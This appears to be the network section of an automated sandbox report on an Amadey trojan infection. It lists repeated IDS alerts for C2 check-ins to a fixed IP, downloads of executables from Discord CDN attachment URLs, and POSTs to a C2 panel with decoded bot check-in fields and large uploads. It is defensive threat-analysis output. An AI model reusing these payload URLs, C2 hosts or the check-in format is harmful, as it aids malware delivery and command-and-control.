              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50013 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50015 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50018 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50020 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50022 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50023 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50025 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50026 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50028 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50030 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50032 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50033 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50036 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50038 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50039 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50041 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50043 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50044 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50045 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50046 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50048 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50049 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50051 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50052 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50054 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50055 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50056 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50057 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50059 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50061 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50063 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50064 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50066 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50068 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50069 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50071 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50073 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50074 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50076 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50078 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50080 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50081 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50082 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50083 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50084 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50085 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50086 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50088 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50089 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50092 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50093 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50094 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50095 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50096 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50097 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50098 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50099 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50101 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50102 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50103 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50104 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50105 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50106 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50108 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50111 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50113 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50115 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50116 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50117 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50118 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50119 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50120 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50121 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50122 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50123 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50125 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50126 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50127 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50128 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50129 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50130 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50131 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50132 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50133 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50134 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50135 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50136 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50137 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50138 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50139 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50140 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50141 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50142 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50143 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50144 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50145 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50146 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50147 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50149 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50150 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50152 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50153 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50154 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50155 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50156 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50158 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50159 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50160 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50161 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50162 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50163 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50165 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50166 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50167 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50168 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50169 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50170 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50171 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50173 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50175 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50176 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50177 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50178 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50179 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50181 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50182 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50183 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50184 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50185 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50186 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50188 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50195 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50214 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50216 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50218 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50220 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50221 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50219 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50222 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50223 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50224 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50226 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50227 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50228 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50229 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50230 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50231 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50232 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50233 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50234 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50235 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50236 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50237 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50238 -> 178.208.83.45:80
              Source: TrafficSnort IDS: 2027700 ET TROJAN Amadey CnC Check-In 192.168.2.4:50239 -> 178.208.83.45:80
              Source: Joe Sandbox ViewASN Name: VDSINA-ASRU VDSINA-ASRU
              Source: Joe Sandbox ViewJA3 fingerprint: 37f463bf4616ecd445d4a1937da06e19
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1Host: cdn.discordapp.comConnection: Keep-Alive
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810887417176084/vms.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----1354c0751e396efa7287aa5f42b89d56Host: depressionk1d.ugContent-Length: 106715Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 30 35 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: e0=1000105001&unit=152138533219
              Source: global trafficHTTP traffic detected: GET /attachments/878034206570209333/908810886561534042/slhost.exe HTTP/1.1Host: cdn.discordapp.com
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----fe5fd9d972afa9463906ab265b5c60cbHost: depressionk1d.ugContent-Length: 117120Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----72f5cde377fbc84156c9f93b3b5c40e7Host: depressionk1d.ugContent-Length: 106960Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----05c424e8f40820a4174cda24ec338f42Host: depressionk1d.ugContent-Length: 108145Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----7326d962c3e55cc0b528f327bd65f0a2Host: depressionk1d.ugContent-Length: 110667Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----db1a118290543eba3f3170fd42f2b8f5Host: depressionk1d.ugContent-Length: 106671Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 31Cache-Control: no-cacheData Raw: 65 30 3d 31 30 30 30 31 30 36 30 30 31 26 75 6e 69 74 3d 31 35 32 31 33 38 35 33 33 32 31 39 Data Ascii: e0=1000106001&unit=152138533219
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php?scr=1 HTTP/1.1Content-Type: multipart/form-data; boundary=----a2459fec127b5ebc62fbd1a7f421763dHost: depressionk1d.ugContent-Length: 108376Cache-Control: no-cache
              Source: global trafficHTTP traffic detected: POST /k8FppT/index.php HTTP/1.1Content-Type: application/x-www-form-urlencodedHost: depressionk1d.ugContent-Length: 82Cache-Control: no-cacheData Raw: 69 64 3d 31 35 32 31 33 38 35 33 33 32 31 39 26 76 73 3d 32 2e 35 30 26 73 64 3d 37 62 36 31 34 35 26 6f 73 3d 31 26 62 69 3d 31 26 61 72 3d 31 26 70 63 3d 38 38 38 36 38 33 26 75 6e 3d 6a 6f 6e 65 73 26 64 6d 3d 26 61 76 3d 31 33 26 6c 76 3d 30 Data Ascii: id=152138533219&vs=2.50&sd=7b6145&os=1&bi=1&ar=1&pc=888683&un=user&dm=&av=13&lv=0
